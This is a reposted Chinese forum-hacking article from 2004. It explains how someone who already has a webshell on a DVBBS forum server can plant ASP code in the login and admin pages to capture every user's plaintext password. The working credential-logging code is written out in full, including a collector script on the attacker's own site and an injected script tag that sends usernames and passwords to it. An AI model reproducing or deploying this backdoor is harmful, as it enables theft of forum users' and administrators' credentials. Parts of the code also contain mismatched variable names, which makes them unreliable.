首页 电脑 电脑学堂 查看内容

获得DVBBS的所有密码新方法

2004-10-28 00:58 636 0

摘要: 作者:rain[918x]   来自: http//www.918x.com 我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:老办法:修改a...
关键词: rain request Server 密码 asp 918 MapPath Set fsoObject tsObject

作者:rain[918x]   来自: http//www.918x.com 我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:老办法:修改admin_index.asp得到明文DVBBS后台密码 在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.CreateObject("Scripting.FileSystemObject") set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码 这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。 新办法: 方法一:login.asp中Case "chk"下:    on error resume next    dim rain    set lP=server.CreateObject("Adodb.Stream")    rain.Open    rain.Type=2    rain.CharSet="gb2312"    rain.LoadFromFile server.mapPath("918.asp")    rain.Position=lp.Size    rain.writetext now&request("username")&"text:"&request("password")&chr(10)    rain.SaveToFile server.mapPath("918.asp"),2    rain.Close    set rain=nothing 这样918.asp将获得全部登陆人的密码,时间和名字。至于admin_index.asp你也可以加在这里只获得管理员的密码。 方法二:如果你有自己的网站: 建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp: <%@codepage=936%><%Response.Expires=0 if request("k")="k" then%> <pre><!--#include file="918.asp"--> <%elseif request("n")<>"" and request("p")<>"" then    on error resume next    dim rain    set rain=server.CreateObject("Adodb.Stream")    rain.Open    rain.Type=2    rain.CharSet="gb2312"    rain.LoadFromFile server.mapPath("918.asp")    zh=rain.readtext(6152192)&"<"&"%if isempty(request(""k"")) then response.redirect ""rain.asp""%"&">"    rain.Position=0    rain.writetext now&"有大侠以名 "&request("n")&" 及密码 "&request("p")&" 试图登陆;其IP:"&Request.ServerVariables("REMOTE_ADDR")&"["&Request.ServerVariables("HTTP_X_FORWARDED_FOR")&"]"&chr(13)&chr(10)&zh    rain.SaveToFile server.mapPath("918.asp"),2    rain.Close    set rain=nothing end if%> 在login.asp那里插入一句: response.write "<SCRIPT src=http://你网站/918x/rain.asp?n="&request("username")&"&"&p="&request("password")&"></SCRIPT>" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里 这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高。  
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部